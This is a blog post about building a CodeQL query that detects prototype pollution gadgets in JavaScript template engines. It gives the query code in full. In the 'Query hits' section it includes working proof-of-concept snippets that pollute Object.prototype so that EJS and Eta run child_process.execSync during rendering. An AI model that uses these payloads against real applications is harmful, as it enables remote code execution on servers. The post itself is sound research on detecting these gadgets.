TL;DR

Following latest CodeQL introduction post and inspired by a challenge from SonarSource’s #codeadvent2021 and SecurityMB’s October 2021 challenge, I thought it would be fun to write a CodeQL query to find prototype pollution gadgets.

I made a quick and dirty approach (to be fair, it was my first time using CodeQL for javascript), that already found interesting results, that I’d eventually improve, so keep reading if you want to see the entire process along with some interesting results!

Prototype Pollution

The objective of this post is not to explain what prototype pollution vulnerability is, but overall, being able to edit an object’s prototype or Object’s prototype (through their properties) lets an attacker pollute it and likely maliciously change affected code’s objective.

Gadgets

We may understand [insert vulnerability here] gadgets as code snippets or behaviours that help a vulnerability to happen. In this case, a prototype pollution gadget is an object’s property read which is not defined flowing to a JS-executing function (such as eval or Function).

  • The gadget needs not to be defined, as object’s property reads uses object’s prototype property reads as a fallback.

CodeQL query development

You may find the final query at #final-query.

The first approach looked like the following snippet:

/**
 * @kind path-problem
 */

import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph

class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }

  // Any {} that does not set a custom __proto__
  override predicate isSource(DataFlow::Node source) {
    exists(DataFlow::ObjectLiteralNode object |
      not object.toString().matches("%\\_\\_proto\\_\\_%") and
      source = object
    )
  }

  // An expression which may be evaluated as JavaScript
  override predicate isSink(DataFlow::Node sink) { sink instanceof EvalJavaScriptSink }

  // Make a valid step: variable = {} -> Object.create(variable)
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::SourceNode c, DataFlow::CallNode call |
      c.toString() = "Object.create" and
      call = c.getACall() and
      nodeFrom = call.getArgument(0) and
      nodeTo = call
    )
  }
}

from BadIfPollutedConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@", source.getNode(), "Empty dict",
  sink.getNode(), "this eval-alike call."

However, almost everything is likely improvable.

Source

override predicate isSource(DataFlow::Node source) {
    exists(DataFlow::ObjectLiteralNode object |
        not object.toString().matches("%\\_\\_proto\\_\\_%") and
        source = object
    )
}

Some of you may have wanted to erase me from the universe for using toString() to check a property access, but that’s the only thing I thought about before digging into CodeQL for JavaScript’s juice.

Playing with objects' properties:

  • a = {}: ObjectLiteralNode declaration.
  • a.foo = "bar": PropWrite
    • getBase() is a use of the first point (then getBase().getALocalSource() is what we will be using to correlate both nodes).
    • getPropertyName() returns foo.
    • getRhs() returns "bar".
  • eval(a.foo): eval’s first argument is a PropRead with the same getBase() and getPropertyName() predicates.
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}

Sink

override predicate isSink(DataFlow::Node sink) {
    sink instanceof EvalJavaScriptSink 
}

Sink’s evolution just focus on getting proper results like tainted in tainted + foo when it is the last step of a flow.

class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;

  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }

  DataFlow::InvokeNode getCall() { result = c }
}

Furthermore, wrapping EvalJavaScriptSink in a variable let us get the call whose argument is that variable in order to make a getCall() predicate used in the select clause of the query.

Additional taint step

override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::SourceNode c, DataFlow::CallNode call |
        c.toString() = "Object.create" and
        call = c.getACall() and
        nodeFrom = call.getArgument(0) and
        nodeTo = call
    )
}

This taint step lets CodeQL know that there may be flow like an ObjectLiteralNode flowing to the first argument of Object.create, whose result is also a valid gadget.

We will be using globalVarRef and its getAMemberCall predicate to properly get Object.create call (instead of using SourceNode’s toString).

override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::InvokeNode objectCreate |
        objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
        nodeFrom = objectCreate.getArgument(0) and
        nodeTo = objectCreate
    )
}

Sanitizer

override predicate isSanitizer(DataFlow::Node sanitizer) {
    exists(LogOrExpr orExpr, Expr leftSource |
        leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
        not leftSource = orExpr.getLeftOperand() and
        not leftSource instanceof NullLiteral and
        not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
        sanitizer.asExpr() = orExpr.getRightOperand()
    )
}

We want to stop tracking flow when a LogOrExpr (foo || bar) holds an ObjectLiteralNode in the right side of the expression and a valid variable in the first operand.

Debugging

Let’s make query development easier and more fun by:

  • Using Backward DataFlow: Set isSource() as any(), so we will be getting every single node flowing to our specific sink.
  • Using Forward DataFlow: Set isSink() as any(), so we will be getting flow from our specific source to any node.
  • Setting custom node files in order to restrict result locations.
  • Using a custom PathNode implementation to get the QL class used in each step of the flow path.

See #debugging-query.

Query hits

In order to test the query, I ran it against all sources listed in Template engines for NodeJS.

LGTM Results

Some snippets to test locally:

// edited from https://twitter.com/sonarsource/status/1471148042577350659

const express = require('express');

const app = express();
app.set('view engine', 'ejs');
app.set('views', __dirname + '/views');

cmd = "sleep 10";

Object.prototype.outputFunctionName = `a;process.mainModule.require('child_process').execSync('${cmd}');//`;
Object.prototype.client = "notEmpty"; Object.prototype.escapeFunction = '`${process.mainModule.require(\'child_process\').execSync(\'' + cmd + '\')}`';
Object.prototype.client = "notEmpty"; Object.prototype.escape = '`${process.mainModule.require(\'child_process\').execSync(\'' + cmd + '\')}`';
Object.prototype.localsName = `a=process.mainModule.require('child_process').execSync('${cmd}')`;
Object.prototype.destructuredLocals = ["/*", `*/a=process.mainModule.require('child_process').execSync('${cmd}');//`];

app.get('/ejs', (req, res) => {
    res.render('template', {foo: "bar"})
})

app.listen(1337);
// edited from https://eta.js.org/docs/examples/express

var express = require("express")
var app = express()
var eta = require("eta")

app.engine("eta", eta.renderFile)
app.set("view engine", "eta")
app.set('views', __dirname + '/views');

cmd = "sleep 10";

Object.prototype.useWith = "notEmpty"; Object.prototype.varName = `a=process.mainModule.require('child_process').execSync('${cmd}')`;

app.get("/eta", function (req, res) {
    res.render("template", {foo: "bar"})
})

app.listen(1337)

Final query

/**
 * @kind path-problem
 */

import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph

/**
 * A custom `EvalJavaScriptSink` wrapper.
 *
 * * `t` holds `EvalJavaScriptSink`.
 * * `c` holds the call holding `t`.
 *
 * There's an additional taint step specified in order to catch
 * `tainted` in sinks like `tainted + foo`; since the sink is
 * the entire argument, this way the results are more accurate.
 */
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;

  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }

  DataFlow::InvokeNode getCall() { result = c }
}

/**
 * An `ObjectLiteralNode` not overriding its `__proto__`, `constructor` and
 * `constructor.prototype` properties.
 *
 * It is not set as sanitizer since flow between two same source-sink AST nodes
 * may differ (i.e., one path in source-sink flow may not pass through this
 * property writes)
 */
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}

class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }

  /**
   * An `ObjectLiteralNode` that does not set a custom prototype
   * on its declaration or flow.
   *
   * See `BadIfPollutedSource`.
   */
  override predicate isSource(DataFlow::Node source) { source instanceof BadIfPollutedSource }

  /**
   * An expression which may be evaluated as JavaScript.
   *
   * See `CustomEvalJavaScriptSink`.
   */
  override predicate isSink(DataFlow::Node sink) { sink instanceof CustomEvalJavaScriptSink }

  /**
   * Make a valid taint step: `a = {} -> Object.create(a)`.
   */
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::InvokeNode objectCreate |
      objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
      nodeFrom = objectCreate.getArgument(0) and
      nodeTo = objectCreate
    )
  }

  /**
   * `foo || BadIfPollutedSource` -> `foo` holds a non (not defined|null|false) value
   *  and so it will be assigned instead of `BadIfPollutedSource`.
   *
   * FP issue: `foo` may be declared out of taint tracking's scope.
   *
   * `leftSource = orExpr.getLeftOperand()`: when a node's local source is itself
   * means the node might not be defined in the scope.
   */
  override predicate isSanitizer(DataFlow::Node sanitizer) {
    exists(LogOrExpr orExpr, Expr leftSource |
      leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
      not leftSource = orExpr.getLeftOperand() and
      not leftSource instanceof NullLiteral and
      not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
      sanitizer.asExpr() = orExpr.getRightOperand()
    )
  }
}

from BadIfPollutedConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@ as $@", source.getNode(), "This object",
  sink.getNode().(CustomEvalJavaScriptSink).getCall(), "this eval-alike call", sink.getNode(),
  sink.toString()

Debugging query

semmle.javascript.custom.Debug:

private import javascript

module Debug {
  /**
   * If `true`, show the QL class for each flow step.
   */
  boolean getDebug() { result = false }

  /**
   * If `true`, apply Backward Dataflow.
   */
  boolean getBackward() { result = false }

  /**
   * If `true`, apply Forward Dataflow.
   */
  boolean getForward() { result = false }

  /**
   * Returns a `File` with a specific basename.
   */
  File getFile() {
    result.getBaseName().matches("%%") and not result.getBaseName().matches("test.js")
  }
}

class CustomPathNode extends DataFlow::PathNode {
  CustomPathNode() { this = this }

  override string toString() {
    if Debug::getDebug() = true
    then result = this.getNode().toString() + ", " + this.getNode().getAQlClass()
    else result = this.getNode().toString()
  }
}

Main query:

/**
 * @kind path-problem
 */

import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph
import semmle.javascript.custom.Debug

/**
 * A custom `EvalJavaScriptSink` wrapper.
 *
 * * `t` holds `EvalJavaScriptSink`.
 * * `c` holds the call holding `t`.
 *
 * There's an additional taint step specified in order to catch
 * `tainted` in sinks like `tainted + foo`; since the sink is
 * the entire argument, this way the results are more accurate.
 */
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
  DataFlow::ValueNode t;
  DataFlow::InvokeNode c;

  CustomEvalJavaScriptSink() {
    t instanceof EvalJavaScriptSink and
    c.getAnArgument() = t and
    (
      if exists(t.asExpr().(AddExpr))
      then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
      else this = t
    )
  }

  DataFlow::InvokeNode getCall() { result = c }
}

/**
 * An `ObjectLiteralNode` not overriding its `__proto__`, `constructor` and
 * `constructor.prototype` properties.
 *
 * It is not set as sanitizer since flow between two same source-sink AST nodes
 * may differ (i.e., one path in source-sink flow may not pass through this
 * property writes)
 */
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
  BadIfPollutedSource() {
    not exists(DataFlow::PropWrite propWrite |
      // ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
      exists( |
        propWrite.getPropertyName() = ["__proto__", "constructor"] and
        propWrite.getBase().getALocalSource() = this
      )
      or
      // ObjectLiteralNode.constructor.prototype
      exists(DataFlow::PropRead constRead |
        constRead.getPropertyName() = "constructor" and
        constRead.getBase().getALocalSource() = this and
        propWrite.getPropertyName() = "prototype" and
        propWrite.getBase().getALocalSource() = constRead
      ) and
      propWrite.getRhs().asExpr() instanceof NullLiteral
    )
  }
}

class BadIfPollutedConfig extends TaintTracking::Configuration {
  BadIfPollutedConfig() { this = "BadIfPollutedConfig" }

  /**
   * An `ObjectLiteralNode` that does not set a custom prototype
   * on its declaration or flow.
   *
   * See `BadIfPollutedSource`.
   */
  override predicate isSource(DataFlow::Node source) {
    (if Debug::getBackward() = true then any() else source instanceof BadIfPollutedSource) and
    source.getFile() = Debug::getFile()
  }

  /**
   * An expression which may be evaluated as JavaScript.
   *
   * See `CustomEvalJavaScriptSink`.
   */
  override predicate isSink(DataFlow::Node sink) {
    (if Debug::getForward() = true then any() else sink instanceof CustomEvalJavaScriptSink) and
    sink.getFile() = Debug::getFile()
  }

  /**
   * Make a valid taint step: `a = {} -> Object.create(a)`.
   */
  override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
    exists(DataFlow::InvokeNode objectCreate |
      objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
      nodeFrom = objectCreate.getArgument(0) and
      nodeTo = objectCreate
    )
  }

  /**
   * `foo || BadIfPollutedSource` -> `foo` holds a non (not defined|null|false) value
   *  and so it will be assigned instead of `BadIfPollutedSource`.
   *
   * FP issue: `foo` may be declared out of taint tracking's scope.
   *
   * `leftSource = orExpr.getLeftOperand()`: when a node's local source is itself
   * means the node might not be defined in the scope.
   */
  override predicate isSanitizer(DataFlow::Node sanitizer) {
    exists(LogOrExpr orExpr, Expr leftSource |
      leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
      not leftSource = orExpr.getLeftOperand() and
      not leftSource instanceof NullLiteral and
      not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
      sanitizer.asExpr() = orExpr.getRightOperand()
    )
  }
}

from BadIfPollutedConfig cfg, CustomPathNode source, CustomPathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@ as $@", source.getNode(), "This object",
  sink.getNode().(CustomEvalJavaScriptSink).getCall(), "this eval-alike call", sink.getNode(),
  sink.toString()

The end

I hope you found it interesting and had fun reading it!

Jorge.